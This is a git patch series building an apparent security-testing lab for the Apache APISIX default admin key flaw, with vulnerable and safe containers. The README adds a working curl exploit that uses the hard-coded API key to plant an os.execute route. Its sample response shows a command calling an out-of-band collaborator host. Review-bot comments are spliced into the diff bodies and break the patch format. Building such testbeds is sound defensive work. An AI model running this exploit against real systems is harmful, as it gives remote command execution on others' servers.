From 6143c36717bae46246aca52a3f4fffbcb2de8af7 Mon Sep 17 00:00:00 2001
From: Robert Dick
Date: Thu, 7 May 2026 08:52:34 -0400
Subject: [PATCH 1/3] unified docker compose and clarified readme

---
 apache/apisix/defaultapitoken/README.md | 6 +++---
 .../docker-compose-non-vulnerable.yml | 17 -----------------
 .../apisix/defaultapitoken/docker-compose.yml | 19 +++++++++++++++----
 3 files changed, 18 insertions(+), 24 deletions(-)
 delete mode 100644 apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml
diff --git a/apache/apisix/defaultapitoken/README.md b/apache/apisix/defaultapitoken/README.md
index 8e1dcfbd..ccfcaac6 100644
--- a/apache/apisix/defaultapitoken/README.md
+++ b/apache/apisix/defaultapitoken/README.md
@@ -3,8 +3,8 @@ This directory contains the deployment configs for an Apache APISIX installation
 Apache APISIX has a built-in default API KEY. If the user does not proactively modify it (which few will), Lua scripts
-can be executed directly through the API interface, which can lead to RCE vulnerabilities.
+can be executed directly through the API interface, which can lead to RCE vulnerabilities. Normally, the admin API endpoints are restricted by the client IP address, but this tests for a case where other IP addresses have been allowed. See the `allow_admin` part of the configuration files.
-You can start the vulnerable service by running the command `docker compose up -d`. The deployed container has name `apache-apisix-defaul-api-token` and listens on port `9080`.
+You can start both the vulnerable service and safe service by running the command `docker compose up -d`. The vulnerable container listens on port `8081`, and the safe container listens on port `8082`.
-The container that is not affected by the vulnerability is `apache-apisix-defaul-api-token-safe`, you can start it with `docker compose -f docker-compose-safe.yml up -d`, and the service listens on port `9081`.
+In this case, the vulnerable service uses APISIX with the default API key, and the safe service uses APISIX with a changed API key using the `config_api_key_change.yml` file.
diff --git a/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml b/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml
deleted file mode 100644
index 005fbdb5..00000000
--- a/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-services:
- apache-apisix-defaul-api-token-safe:
- image: apache/apisix:2.11.0-alpine
- restart: unless-stopped
- ports:
- - "9081:9080"
- volumes:
- - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro
- depends_on:
- - etcd
- etcd:
- image: bitnami/etcd:3.4.15
- environment:
- ETCD_ENABLE_V2: "true"
- ALLOW_NONE_AUTHENTICATION: "yes"
- ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
- ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
diff --git a/apache/apisix/defaultapitoken/docker-compose.yml b/apache/apisix/defaultapitoken/docker-compose.yml
index 981ea86f..64fdc14e 100644
--- a/apache/apisix/defaultapitoken/docker-compose.yml
+++ b/apache/apisix/defaultapitoken/docker-compose.yml
@@ -1,15 +1,26 @@
 services:
- apache-apisix-defaul-api-token:
- image: apache/apisix:2.11.0-alpine
+ apache-apisix-default-api-token:
+ image: apache/apisix:2.13.0-alpine
+ platform: linux/amd64
 restart: unless-stopped
 ports:
- - "9080:9080"
+ - "8081:9080"
 volumes:
 - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro
 depends_on:
 - etcd
+ apache-apisix-default-api-token-safe:
+ image: apache/apisix:2.13.0-alpine
+ platform: linux/amd64
+ restart: unless-stopped
+ ports:
+ - "8082:9080"
+ volumes:
+ - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro
+ depends_on:
+ - etcd
 etcd:
- image: bitnami/etcd:3.4.15
+ image: bitnamilegacy/etcd:3.4.15
 environment:
 ETCD_ENABLE_V2: "true"
 ALLOW_NONE_AUTHENTICATION: "yes"
From dd21595db0176a33acd0328e3f10eae4bfbcb634 Mon Sep 17 00:00:00 2001
From: Robert Dick
Date: Thu, 11 Jun 2026 08:47:59 -0400
Subject: [PATCH 2/3] improved reliability

---
 .../apisix/defaultapitoken/docker-compose.yml | 48 +++++++++++++++++--
 1 file changed, 44 insertions(+), 4 deletions(-)
diff --git a/apache/apisix/defaultapitoken/docker-compose.yml b/apache/apisix/defaultapitoken/docker-compose.yml
index 64fdc14e..f558b4e9 100644
--- a/apache/apisix/defaultapitoken/docker-compose.yml
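Review bot: In the docker-compose.yml hunk of PATCH 1/3, `- "8081:9080"` and `- "8082:9080"` publish the APISIX admin API, which in the vulnerable instance still runs on its default key, on every host interface, so anyone on the host's network can reach it. Binding to loopback, `- "127.0.0.1:8081:9080"` and `- "127.0.0.1:8082:9080"`, keeps the lab reachable from the host only unless a user deliberately widens it. In this revision both APISIX services also point `depends_on` at the single `etcd`, so a route written through the vulnerable admin API would presumably be visible to the safe instance as well; the next patch in the series addresses that by giving each instance its own etcd and network.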
+++ b/apache/apisix/defaultapitoken/docker-compose.yml
@@ -1,5 +1,5 @@
 services:
- apache-apisix-default-api-token:
+ apache-apisix-default-api-token-vuln:
 image: apache/apisix:2.13.0-alpine
 platform: linux/amd64
 restart: unless-stopped
@@ -8,7 +8,12 @@ services:
 volumes:
 - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro
 depends_on:
- - etcd
+ etcd-vuln:
+ condition: service_healthy
+ networks:
+ vuln:
+ aliases:
+ - apisix
 apache-apisix-default-api-token-safe:
 image: apache/apisix:2.13.0-alpine
 platform: linux/amd64
@@ -18,11 +23,46 @@ services:
 volumes:
 - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro
 depends_on:
- - etcd
- etcd:
+ etcd-safe:
+ condition: service_healthy
+ networks:
+ safe:
+ aliases:
+ - apisix
+ etcd-vuln:
 image: bitnamilegacy/etcd:3.4.15
 environment:
 ETCD_ENABLE_V2: "true"
 ALLOW_NONE_AUTHENTICATION: "yes"
 ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
 ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
+ healthcheck:
+ test: ["CMD", "curl", "-sf", "http://localhost:2379/health"]
+ interval: 5s
+ timeout: 3s
+ retries: 10
+ networks:
+ vuln:
+ aliases:
+ - etcd
+ etcd-safe:
+ image: bitnamilegacy/etcd:3.4.15
+ environment:
+ ETCD_ENABLE_V2: "true"
+ ALLOW_NONE_AUTHENTICATION: "yes"
+ ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
+ ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
+ healthcheck:
+ test: ["CMD", "curl", "-sf", "http://localhost:2379/health"]
+ interval: 5s
+ timeout: 3s
+ retries: 10
+ networks:
+ safe:
+ aliases:
+ - etcd
+networks:
+ safe:
+ driver: bridge
+ vuln:
+ driver: bridge
\ No newline at end of file
From c7ac44d80c198fb8cbaf3aac49678541964d9173 Mon Sep 17 00:00:00 2001
From: Robert Dick
Date: Thu, 11 Jun 2026 12:34:22 -0400
Subject: [PATCH 3/3] added curl command

---
 apache/apisix/defaultapitoken/README.md | 28 +++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
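Review bot: The `healthcheck` added for `etcd-vuln` and `etcd-safe` in the last hunk of PATCH 2/3 depends on `curl` being installed inside `bitnamilegacy/etcd:3.4.15`; I cannot confirm that from this diff, and if the binary is absent every probe fails, both etcd services stay unhealthy and the `condition: service_healthy` dependencies keep the two APISIX containers from ever starting. `etcdctl` ships in the etcd image itself, so `test: ["CMD", "etcdctl", "endpoint", "health"]` removes that assumption. The two etcd definitions are otherwise identical apart from their network, so an `x-etcd: &etcd` extension block merged into each service with `<<: *etcd` would keep the environment and healthcheck from drifting apart. The file also now ends without a trailing newline, as the `\ No newline at end of file` marker after the final `driver: bridge` shows.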
diff --git a/apache/apisix/defaultapitoken/README.md b/apache/apisix/defaultapitoken/README.md
index ccfcaac6..fe22cd10 100644
--- a/apache/apisix/defaultapitoken/README.md
+++ b/apache/apisix/defaultapitoken/README.md
@@ -8,3 +8,31 @@ can be executed directly through the API interface, which can lead to RCE vulner
 You can start both the vulnerable service and safe service by running the command `docker compose up -d`. The vulnerable container listens on port `8081`, and the safe container listens on port `8082`.
 In this case, the vulnerable service uses APISIX with the default API key, and the safe service uses APISIX with a changed API key using the `config_api_key_change.yml` file.
+
+## Testing the vulnerability
+
+Run the following command, replacing `YOUR_COMMAND_HERE` with the command you want to execute (this won't be executed from this curl command alone, you need to execute the route too):
+```
+curl -X PUT "http://localhost:8081/apisix/admin/routes/tsunami_rce?ttl=30" \
+ -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" \
+ -H "Content-Type: application/json" \
+ -d '{
+ "uri": "/test/anything",
+ "upstream": {
+ "type": "roundrobin",
+ "nodes": {}
+ },
+ "name": "anything",
+ "filter_func": "function(vars) return os.execute(\"YOUR_COMMAND_HERE\")==true end"
+ }'
+```
+
+Vulnerable Response:
+```
+{"action":"set","lease_id":"7587895458205140304","node":{"value":{"update_time":1781195535,"filter_func":"function(vars) return os.execute(\"curl 132ovru87ms15vti1jl0vw77gymparyg.burpserver.doyentesting.com\")==true end","priority":0,"id":"tsunami_rce","name":"anything","create_time":1781195535,"uri":"\/test\/anything","status":1,"upstream":{"scheme":"http","type":"roundrobin","hash_on":"vars","pass_host":"pass","nodes":{}}},"key":"\/apisix\/routes\/tsunami_rce"}}
+```
+
+Safe Response:
+```
+{"error_msg":"failed to check token"}
+```